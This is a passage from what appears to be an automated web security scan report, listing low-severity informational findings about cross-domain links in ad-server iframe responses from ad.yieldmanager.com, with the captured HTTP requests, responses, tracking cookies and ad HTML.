Set-Cookie: ih="b!!!!+!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!4=3f8a!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8a!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8_"; path=/; expires=Thu, 05-Sep-2013 12:44:55 GMT
Set-Cookie: vuday1=BgvR5!79C8'$[q]; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: lifb=BcN3V!yANGM5Jkn$AVp-2AQ4:; path=/; expires=Tue, 06-Sep-2011 16:44:55 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:55 GMT
Pragma: no-cache
Content-Length: 2706
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982306);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=http://ad.doubleclick.net/jump/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1315313095?">
<IMG SRC="http://ad.doubleclick.net/ad/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1315313095?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=77&campID=106300&crID=126548&auctionID=13153130951610984-126548&cost=2.7600&pubICode=2145116&pub=24284&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=77" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.38. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?5jBaAP-hGABxQIsAAAAAAB4aEgAAAAAAAAAEAAIAAAAAAAYABQADCBs1BAAAAAAAfG8GAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADLJAIAAAAAAAIAAwAAAAAAzczMzMxMC0AAAAAAAAAUQM3MzMzMTAtAAAAAAAAAFEDNzMzMzEwLQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVc.WrdvuuCl-qJ5SfXXwaYLy4SZmf62flH2cNAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15tk89q4f%2FM%3D787833.14445123.14291890.1641906%2FD%3Dclassreal%2FS%3D750052199%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320597%2FL%3D_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u%2FB%3DOrXDQmKJiR8-%2FJ%3D1315313397366429%2FK%3DiwgPsw1Pz1yP_tp9hGoa9Q%2FA%3D6261242%2FR%3D0%2F%2A%24,http%3A%2F%2Frealestate.yahoo.com%2Fsearch%2Fnew_york%2Fnew_york%2Fhomes-for-sale%3Ftypebak%3Drealestate%26p%3D10010%26type%3Dclassified%26pricelow%3D%26pricehigh%3D%26bedroomlow%3D%26bathroomlow%3D%26search%3Dsearch,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445123%26Z%3D300x250%26_PVID%3D%255fQVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u%26_salt%3D3072436167%26cb%3D1315313397366429%26i%3D140491%26r%3D0,ba32b4c2-d886-11e0-b73e-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u&ad_type=iframe&ad_size=300x250&site=140491&section_code=14445123&cb=1315313397366429&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15tk89q4f/M=787833.14445123.14291890.1641906/D=classreal/S=750052199:LREC/Y=YAHOO/EXP=1315320597/L=_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u/B=OrXDQmKJiR8-/J=1315313397366429/K=iwgPsw1Pz1yP_tp9hGoa9Q/A=6261242/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jX5>i; lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0164.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!*=3f=@!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:50:03 GMT
Set-Cookie: vuday1=oyOxB!79C8GkUST; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$YI2!1n,b!#t3o!!H<'!!ZH)$To(3!w1K*!!J0y!!_Cl!$]7n~~~~~=3f=@~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:50:03 GMT
Set-Cookie: uid=uid=bd3d86f6-d886-11e0-929f-78e7d1fad4b4&_hmacv=1&_salt=2635402791&_keyid=k1&_hmac=027f7e4536e72f626ca7dee1d1a1539a87bc81c5; path=/; expires=Thu, 06-Oct-2011 12:50:03 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:50:03 GMT
Pragma: no-cache
Content-Length: 1497
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=421756&bli=1634623&exPub=54785&city=Dallas&acp=3.4125&rnd=1315313403&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUF1zojAU%2ETM7PuwoIYSv1MnshGpZERSobrUvToBgUFwosEX99avF1n3dPOSeezLnnnMD0TAyZEU1o4inqZ6kkTGESEE8xrEWJX15OBwiXcGGqRqK1td2FqP%2DQNjUOgaTmn4cS2XjbQcv95jSya1ZUyugo0erhtaNSW3TvkHJDO%2DiG%2EcfZeQ6Xz4Xv7aTvscrx99NPu0otR3hnZ1sZnsn9yVQ56N14y2ecu8RZrPzLHcXsfq6SPbeYn18PSyV%2DT0B6YumKR8A2OZFxHKJVYl0YqIopLg4gOeJTaDW7E38pqbAI4ZpmAhJUFVVDSpXoGBoYlmCugqxrIMRiXNW1xVnOXgmhibLmgIxfnDD8SNYkzX9OZ%2DD8conEEENKbKGDeCSTfBr5b5MHXFclTQsd4tcanchX3oiMdheOzy9L6nloT%2EAIvNqNQoOUycLzQFwujEQIWwgXb%2DEAVOStVu%2EbqF%2Ehid%2E05RY2AXDAaBEV3SoqAoIiQy%2Df%2Evc%2DxqV1w1r%2DD9715xVsQC%2Eebs5FdX%2DDkRx4PUgLapBfZH9aE4lj9ie3If0SgJlGcq961P3GVma8aRXVlnM86IlHRLZVpBexJOqKA4fdMQa8dV0AUhX%2EgIkp9W7%2C&url=http%3A%2F%2Frealestate%2Eyahoo%2Ecom%2Fsearch%2Fnew%5Fyork%2Fnew%5Fyork%2Fhomes%2Dfor%2Dsale%3Ftypebak%3Drealestate%26p%3D10010%26type%3Dclassified%26pricelow%3D%26pricehigh%3D%26bedroomlow%3D%26bathroomlow%3D%26search%3Dsearch" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.39. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?5jBaAAKVGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAAMABAADCFKvBAAAAAAANBEnAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRQIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIyAayhvquCh0.RV9ZUkvbFGyuIJuMsVzWLN4xAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rnestpp%2FM%3D787833.14445112.14291879.10366300%2FD%3Do_m_g%2FS%3D2115806991%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320358%2FL%3DwSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5%2FB%3D.kJ3QtBDRmg-%2FJ%3D1315313158085814%2FK%3D8HRnHXMgH3x.FZViOHEasw%2FA%3D6261235%2FR%3D0%2F%2A%24,http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl3d3dy55ywhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445112%26Z%3D300x250%26_PVID%3DwSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5%26_salt%3D2906618223%26cb%3D1315313158085814%26i%3D148950%26r%3D0,2b2a4ea2-d886-11e0-a8a4-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=wSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5&ad_type=iframe&ad_size=300x250&site=148950&section_code=14445112&cb=1315313158085814&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rnestpp/M=787833.14445112.14291879.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1315320358/L=wSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5/B=.kJ3QtBDRmg-/J=1315313158085814/K=8HRnHXMgH3x.FZViOHEasw/A=6261235/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!-!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; vuday1=@n$r!BKZI(BgvR-4M6Eq!79C8VY0tU; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0402.rm.sp2
Set-Cookie: ih="b!!!!#!1n,b!!!!#=3f:!"; path=/; expires=Thu, 05-Sep-2013 12:46:45 GMT
Set-Cookie: vuday1=oyOxB!79C8GkUST; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f:!~~"; path=/; expires=Thu, 05-Sep-2013 12:46:45 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:46:45 GMT
Pragma: no-cache
Content-Length: 1383
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=2560308&bli=1634623&exPub=59580&city=Dallas&acp=2.8980&rnd=1315313205&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNUduSmkAQ%2EZlUHlKGmZ5hYFhrKgWK4gVRNN5etgaGhVUQComXv49ZtTZ5Sz%2E0Od1VfU53NdC2ZSVWQkwS65GK40i2gRKaxEYMDFq43W5TwjiASQC32M6Rtj1a9m3nMhsc7Y9wdOmmd3rPg0fh245tdzu90emGHzFx3MODajz8Z%2DjR%2El%2EorsLZ0%2DeG5%2Evcz9jrT3eDp93NffjuFy7ertzreDXTg%2D6m8Re93O9AFvRdPF7E%2Dnah9v5iWUz6k73%2EaS9aWdNULwileRnJXJO10q4yK0stLgs0H%2EQFsPqQHJuqQr4wuckp1UDXdQZAboRYwE1LA0wNg2KMuqJ8LV5TNBcEgHFsWBa8jEO3gzZiY3tBgNz1VAAFRgmmjKOxOM%2DrfFiMBsG0ruyw2i1y7bwLf639TJlyz4peurHt%2EowhR2j7IZ01Tjcs0u9oeJf5o8Uxvz1PRyPBvfDgrf3Uoxett12%2DB54rj2dkC4MYQChDocDo25fn1WWR%2EnXuJauRVCivkxh9rv%2DjTt6EzGocq%2EKUU0XVlbHrOTtFV7aLCD59bcp9chCRbjIldc5BvVk65hiUaVhcSksBGDL6DRcbt6o%3D%2C&url=http%3A%2F%2Fomg%2Eyahoo%2Ecom%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl3d3dy55ywhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.40. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

